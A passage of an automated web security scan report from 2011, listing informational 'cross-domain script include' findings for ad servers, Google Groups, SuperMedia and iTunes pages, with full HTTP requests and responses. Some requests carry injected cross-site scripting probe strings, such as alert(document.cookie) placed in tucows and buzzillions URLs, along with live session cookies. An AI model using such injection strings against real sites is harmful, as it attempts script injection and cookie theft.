Set-Cookie: dyk=1; expires=Thu, 10-Feb-2011 20:32:20 GMT; path=/; domain=.digitalpoint.com
Cache-Control: private
Pragma: private
Content-Length: 24249
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<meta property="og:image" content="http://i.dpstatic.com/misc/dps_logo2.png" />


<script type="text/javascript" src="http://yui.yahooapis.com/2.8.2/build/yuiloader-dom-event/yuiloader-dom-event.js?v=411"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.8.2/build/connection/connection-min.js?v=411"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s.dpstatic.com/s/vbulletin-core.js?v=411"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type="text/javascript" src="http://s.dpstatic.com/s/digitalpoint.js?v=411e"></script>
...[SNIP]...
</title>

<script type="text/javascript" src="http://s.dpstatic.com/s/vbulletin_md5.js?v=411"></script>
...[SNIP]...
<li>
<script type="text/javascript" src="http://s.dpstatic.com/s/vbulletin_md5.js?v=411"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s.dpstatic.com/s/vbulletin_facebook.js?v=411"></script>
<script type="text/javascript" src="http://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...

19.77. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pagead/ads?client=ca-pub-2047107563931596&output=html&h=90&slotname=8213712147&w=728&ea=0&flash=10.1.103&url=http%3A%2F%2Fwww.tucows.com%2Fpreviewf2a0f%2522-alert(document.cookie)-%2522d3b3f7c7cb3%2F194850%2Fx22&dt=1296766283429&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296766283459&frm=1&adk=539573683&ga_vid=579460989.1296766283&ga_sid=1296766283&ga_hid=838670802&ga_fc=0&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3718268994&fu=0&ifi=1&dtd=34 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www8.tucows.com/delivery/afr.php?zoneid=187&cb=6253c4ae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 03 Feb 2011 20:50:41 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4098

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

19.78. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-1151291606842001&format=336x280_as&output=html&h=280&w=336&lmt=1296792058&channel=2580485469%2B6676530356%2B7430941303%2B7423008677%2B3389984008%2B2770489863%2B5766974533%2B0079161462&ad_type=text&color_bg=FFFFFF&color_border=FFFFFF&color_link=0085A0&color_text=777777&color_url=0085A0&flash=10.1.103&hints=reviews59ab9titlescriptalert1script4e54375ce26x22%20review%20reviews&url=http%3A%2F%2Fwww.buzzillions.com%2Freviews%2F59ab9%253C%2Ftitle%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E4e54375ce26%2Fx22&dt=1296770457996&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296770458025&frm=0&adk=16166161&ga_vid=2100204031.1296770458&ga_sid=1296770458&ga_hid=2006706455&ga_fc=0&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1033&bih=1012&ref=http%3A%2F%2Fburp%2Fshow%2F17&fu=0&ifi=1&dtd=101&xpc=ImbB79zpHm&p=http%3A//www.buzzillions.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.buzzillions.com/reviews/59ab9%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E4e54375ce26/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 03 Feb 2011 22:00:08 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 14297

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0085a0;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

19.79. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-2047107563931596&output=html&h=90&slotname=8213712147&w=728&ea=0&flash=10.1.103&url=http%3A%2F%2Fwww.tucows.com%2Fpreviewf2a0f%2522-alert(document.cookie)-%2522d3b3f7c7cb3%2F194850%2Fx22&dt=1296766283429&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296766283459&frm=1&adk=539573683&ga_vid=579460989.1296766283&ga_sid=1296766283&ga_hid=838670802&ga_fc=0&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3718268994&fu=0&ifi=1&dtd=34 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www8.tucows.com/delivery/afr.php?zoneid=187&cb=6253c4ae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 03 Feb 2011 21:41:17 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 1801

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://ib.adnxs.com/ab?enc=FP93RIUqDUAU_3dEhSoNQAAAAEAzMwNAFP93RIUqDUAV_3dEhSoNQO5sBA7j-CcBBWHfHSmrEEL9IEtNAAAAAJUwAAC1AAAANQEAAAIAAACGaAIA0WMAAAEAAABVU0QAVVNEANgCWgAuDE0ATAYBAgUCAAQAAAAAiRtCvwAAAAA.&tt_code=vert-733&udj=uf%28%27a%27%2C+537%2C+1296769277%29%3Buf%28%27c%27%2C+5740%2C+1296769277%29%3Buf%28%27r%27%2C+157830%2C+1296769277%29%3Bppv%28783%2C+%2783308772206079214%27%2C+1296769277%2C+1298065277%2C+5740%2C+25553%29%3B&cnd=!CxUlOwjsLBCG0QkYACDRxwEoTTE_15BnhSoNQEITCAAQABgAIAEo_v__________AUgAUABYrhhgAGi1Ag..&referrer=http://www.tucows.com/previewf2a0f%2522-alert(document.cookie)-%2522d3b3f7c7cb3/194850/x22&pp=TUsg_QAIpdsK5X3QBzhawLMH2W94lylWDqmxiA&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB6Tt0_SBLTdvLItD7lQfAteE57_rvmgKnoIehGuPbjo8MABABGAEgADgBUIDH4cQEYMm-somQpNARggEXY2EtcHViLTIwNDcxMDc1NjM5MzE1OTayAQ53d3cudHVjb3dzLmNvbboBCTcyOHg5MF9hc8gBCdoBVmh0dHA6Ly93d3cudHVjb3dzLmNvbS9wcmV2aWV3ZjJhMGYlMjItYWxlcnQoZG9jdW1lbnQuY29va2llKS0lMjJkM2IzZjdjN2NiMy8xOTQ4NTAveDIymAK4F8ACBMgCq4KlDqgDAegD3QXoA6YD9QMCAABE%26num%3D1%26sig%3DAGiWqtxHRI2wjJsysZ9TXU_4G9hbwhS_Wg%26client%3Dca-pub-2047107563931596%26adurl%3D"></script>
...[SNIP]...

19.80. http://groups.google.com/grphp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://groups.google.com
Path:   /grphp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /grphp HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=a882ba2c85085b39:TM=1296765185:LM=1296765185:S=gXivMzaMSKmp3KUf; expires=Sat, 02-Feb-2013 20:33:05 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Thu, 03 Feb 2011 20:33:05 GMT
Server: GWS-GRFE/0.50
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"> </script>
...[SNIP]...

19.81. http://ir.supermedia.com/stockquote.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ir.supermedia.com
Path:   /stockquote.cfm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /stockquote.cfm HTTP/1.1
Host: ir.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 19:36:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A02%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:03 GMT;path=/
Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:03 GMT;path=/
Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:36:03 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>SuperMedia - Stock Information</title>

<meta http-equiv="Conten
...[SNIP]...
</script>
   <script type="text/javascript" src="http://charts.edgar-online.com/ext/charts.dll?2-4-e-0-0-512-03NA000000SPMD&fs-100-SF:1|2|5|3|22-BG=ffffff-BG1=ffffff-BG2=ffffff-FF:A18=E2E8F1|A33=E2E8F1-ht=250-wd=400-FT:0=6-HO:SW|SE|NW|NE-AP:9=2|10=2-FB:1=ffffff-FL:2=990033-FF:2=990033-FL:3=009900-FF:3=009900-FL:1=dc7926-FF:1=dc7926-FL:18=dc7926-FF:18=dc7926-FL:5=0E1388-FF:5=0E1388-AT:9=1-FI:|22=4-IMAP=1"></script>
...[SNIP]...

19.82. http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewFeature  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://itunes.apple.com
Path:   /WebObjects/MZStore.woa/wa/viewFeature

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /WebObjects/MZStore.woa/wa/viewFeature HTTP/1.1
Host: itunes.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 17:52:19 GMT
x-apple-orig-url-path: /WebObjects/MZStore.woa/wa/viewFeature
x-apple-application-site: CUP
Content-Type: text/html; charset=utf-8
x-apple-asset-version: 82804
x-apple-application-instance: 329
x-apple-max-age: 3600
x-apple-lokamai-no-cache: true
x-apple-request-store-front: <null>
x-apple-date-generated: Thu, 03 Feb 2011 17:52:19 GMT
x-apple-aka-ttl: Generated Thu Feb 03 09:52:19 PST 2011, Expires Thu Feb 03 09:52:19 PST 2011, TTL 0s
x-apple-woa-inbound-url: /WebObjects/MZStore.woa/wa/viewFeature
x-webobjects-loadaverage: 0
Vary: X-Apple-Store-Front
Expires: Thu, 03 Feb 2011 17:52:19 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:52:19 GMT
Content-Length: 4727
Connection: close
Vary: X-Apple-Store-Front
X-Apple-Partner: origin.0

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">

<HTML>
<HEAD>
<TITLE>Connecting to the iTunes Store.</TITLE>
<META name="description" content="Connecting to the iTunes Store."></META>

...[SNIP]...
</META>

<script type="text/javascript" charset="utf-8" src="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-base.jsz"></script>
<script type="text/javascript" charset="utf-8" src="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-preview.jsz"></script>
...[SNIP]...

19.83. http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewMovie  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://itunes.apple.com
Path:   /WebObjects/MZStore.woa/wa/viewMovie

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /WebObjects/MZStore.woa/wa/viewMovie HTTP/1.1
Host: itunes.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 17:47:11 GMT
x-apple-orig-url-path: /WebObjects/MZStore.woa/wa/viewMovie
x-apple-application-site: NWK
Content-Type: text/html; charset=utf-8
x-apple-asset-version: 82803
x-apple-application-instance: 16074
x-apple-max-age: 3600
x-apple-lokamai-no-cache: true
x-apple-request-store-front: <null>
x-apple-date-generated: Thu, 03 Feb 2011 17:47:11 GMT
x-apple-aka-ttl: Generated Thu Feb 03 09:47:11 PST 2011, Expires Thu Feb 03 09:47:11 PST 2011, TTL 0s
x-apple-woa-inbound-url: /WebObjects/MZStore.woa/wa/viewMovie
x-webobjects-loadaverage: 0
Expires: Thu, 03 Feb 2011 17:47:11 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:47:11 GMT
Content-Length: 4721
Connection: close
Vary: X-Apple-Store-Front
X-Apple-Partner: origin.0

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">

<HTML>
<HEAD>
<TITLE>Connecting to the iTunes Store.</TITLE>
<META name="description" content="Connecting to the iTunes Store."></META>

...[SNIP]...
</META>

<script type="text/javascript" charset="utf-8" src="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-base.jsz"></script>
<script type="text/javascript" charset="utf-8" src="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-preview.jsz"></script>
...[SNIP]...

19.84. http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewMultiRoom  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://itunes.apple.com
Path:   /WebObjects/MZStore.woa/wa/viewMultiRoom

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /WebObjects/MZStore.woa/wa/viewMultiRoom HTTP/1.1
Host: itunes.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 17:52:15 GMT
x-apple-orig-url-path: /WebObjects/MZStore.woa/wa/viewMultiRoom
x-apple-application-site: CUP
Content-Type: text/html; charset=utf-8
x-apple-asset-version: 82804
x-apple-application-instance: 537
x-apple-max-age: 3600
x-apple-lokamai-no-cache: true
x-apple-request-store-front: <null>
x-apple-date-generated: Thu, 03 Feb 2011 17:52:15 GMT
x-apple-aka-ttl: Generated Thu Feb 03 09:52:15 PST 2011, Expires Thu Feb 03 09:52:15 PST 2011, TTL 0s
x-apple-woa-inbound-url: /WebObjects/MZStore.woa/wa/viewMultiRoom
x-webobjects-loadaverage: 0
Vary: X-Apple-Store-Front
Expires: Thu, 03 Feb 2011 17:52:15 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:52:15 GMT
Content-Length: 4733
Connection: close
Vary: X-Apple-Store-Front
X-Apple-Partner: origin.0

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">

<HTML>
<HEAD>
<TITLE>Connecting to the iTunes Store.</TITLE>
<META name="description" content="Connecting to the iTunes Store."></META>

...[SNIP]...
</META>

<script type="text/javascript" charset="utf-8" src="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-base.jsz"></script>
<script type="text/javascript" charset="utf-8" src="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-preview.jsz"></script>
...[SNIP]...

19.85. http://itunes.apple.com/us/album/i-need-doctor-feat-eminem/id415573229  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://itunes.apple.com
Path:   /us/album/i-need-doctor-feat-eminem/id415573229

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/album/i-need-doctor-feat-eminem/id415573229 HTTP/1.1
Host: itunes.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 17:51:22 GMT
x-apple-orig-url-path: /us/album/i-need-doctor-feat-eminem/id415573229
x-apple-application-site: CUP
x-apple-max-age: 3600
Content-Type: text/html
x-apple-woa-inbound-url: /WebObjects/MZStore.woa/wa/viewAlbum?cc=us&id=415573229
x-apple-application-instance: 519
x-apple-aka-ttl: Generated Thu Feb 03 09:51:22 PST 2011, Expires Thu Feb 03 09:52:22 PST 2011, TTL 60s
x-webobjects-loadaverage: 0
Cache-Control: no-transform, max-age=8
Date: Thu, 03 Feb 2011 17:52:14 GMT
Connection: close
Connection: Transfer-Encoding
X-Apple-Partner: origin.0
Content-Length: 63325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.apple.com/itms/" lang="en">


<head>
<!-- parent component = "SEOHAlbumPag
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-preview.cssz" />


<script type="text/javascript" charset="utf-8" src="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-base.jsz"></script>
<script type="text/javascript" charset="utf-8" src="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-preview.jsz"></script>
<script type="text/javascript" charset="utf-8" src="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-previewRegionSensitive.jsz"></script>
...[SNIP]...

19.86. http://itunes.apple.com/us/app/dead-space/id396018321  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://itunes.apple.com
Path:   /us/app/dead-space/id396018321

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/app/dead-space/id396018321?mt=8&v0=WWW-NAUS-STAPG-GAMESAPPS-PROMO HTTP/1.1
Host: itunes.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 17:50:48 GMT
x-apple-lok-response-date: Thu Feb 03 09:51:20 PST 2011
x-apple-lok-current-storefront: <null>
x-apple-orig-url-path: /us/app/dead-space/id396018321?mt=8&v0=WWW-NAUS-STAPG-GAMESAPPS-PROMO
x-apple-application-site: CUP
Content-Type: text/html
x-apple-lok-expire-date: Thu Feb 03 09:54:48 PST 2011
x-apple-lok-stor: memcached
x-apple-max-age: 3600
x-apple-woa-inbound-url: /WebObjects/MZStore.woa/wa/viewSoftware?cc=us&id=396018321&mt=8&v0=WWW-NAUS-STAPG-GAMESAPPS-PROMO
x-apple-application-instance: 106
x-apple-lok-path: v0_1:MZStore/viewSoftware&cc=us&id=396018321&mt=8&v0=WWW-NAUS-STAPG-GAMESAPPS-PROMO-143441,pc-8-Ak
x-apple-aka-ttl: Generated Thu Feb 03 09:51:20 PST 2011, Expires Thu Feb 03 09:52:20 PST 2011, TTL 60s
x-apple-lok-ttl: Generated Thu Feb 03 09:50:48 PST 2011, Expires Thu Feb 03 09:54:48 PST 2011, TTL 240s
x-webobjects-loadaverage: 0
Cache-Control: no-transform, max-age=7
Date: Thu, 03 Feb 2011 17:52:13 GMT
Content-Length: 31025
Connection: close
X-Apple-Partner: origin.0

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.apple.com/itms/" lang="en">


<head>
<!-- parent component = "SEOHSoftware
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-preview.cssz" />


<script type="text/javascript" charset="utf-8" src="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-base.jsz"></script>
<script type="text/javascript" charset="utf-8" src="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-preview.jsz"></script>
...[SNIP]...

19.87. http://itunes.apple.com/us/app/the-daily/id411516732  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://itunes.apple.com
Path:   /us/app/the-daily/id411516732

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/app/the-daily/id411516732 HTTP/1.1
Host: itunes.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 17:46:31 GMT
x-apple-lok-response-date: Thu Feb 03 09:47:11 PST 2011
x-apple-lok-current-storefront: <null>
x-apple-orig-url-path: /us/app/the-daily/id411516732
x-apple-application-site: NWK
Content-Type: text/html
x-apple-lok-expire-date: Thu Feb 03 09:50:31 PST 2011
x-apple-lok-stor: memcached
x-apple-max-age: 3600
x-apple-woa-inbound-url: /WebObjects/MZStore.woa/wa/viewSoftware?cc=us&id=411516732
x-apple-application-instance: 12071
x-apple-lok-path: v0_1:MZStore/viewSoftware&cc=us&id=411516732-143441,pc-8-Ak
x-apple-aka-ttl: Generated Thu Feb 03 09:47:11 PST 2011, Expires Thu Feb 03 09:48:11 PST 2011, TTL 60s
x-apple-lok-ttl: Generated Thu Feb 03 09:46:31 PST 2011, Expires Thu Feb 03 09:50:31 PST 2011, TTL 240s
x-webobjects-loadaverage: 0
Cache-Control: no-transform, max-age=60
Date: Thu, 03 Feb 2011 17:47:11 GMT
Content-Length: 20724
Connection: close
X-Apple-Partner: origin.0

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.apple.com/itms/" lang="en">


<head>
<!-- parent component = "SEOHSoftware
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-preview.cssz" />


<script type="text/javascript" charset="utf-8" src="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-base.jsz"></script>
<script type="text/javascript" charset="utf-8" src="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-preview.jsz"></script>
...[SNIP]...

19.88. http://itunes.apple.com/us/app/wild-about-books/id407309460  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://itunes.apple.com
Path:   /us/app/wild-about-books/id407309460

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/app/wild-about-books/id407309460 HTTP/1.1
Host: itunes.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 17:51:21 GMT
x-apple-orig-url-path: /us/app/wild-about-books/id407309460
x-apple-application-site: CUP
x-apple-max-age: 3600
Content-Type: text/html
x-apple-woa-inbound-url: /WebObjects/MZStore.woa/wa/viewSoftware?cc=us&id=407309460
x-apple-application-instance: 254
x-apple-aka-ttl: Generated Thu Feb 03 09:51:21 PST 2011, Expires Thu Feb 03 09:52:21 PST 2011, TTL 60s
x-webobjects-loadaverage: 0
Cache-Control: no-transform, max-age=6
Date: Thu, 03 Feb 2011 17:52:13 GMT
Content-Length: 24468
Connection: close
X-Apple-Partner: origin.0

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.apple.com/itms/" lang="en">


<head>
<!-- parent component = "SEOHSoftware
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-preview.cssz" />


<script type="text/javascript" charset="utf-8" src="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-base.jsz"></script>
<script type="text/javascript" charset="utf-8" src="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-preview.jsz"></script>
...[SNIP]...

19.89. http://itunes.apple.com/us/artist/the-beatles/id136975  previous  next

Summary

Severity:   Information
Confidence:   Certain
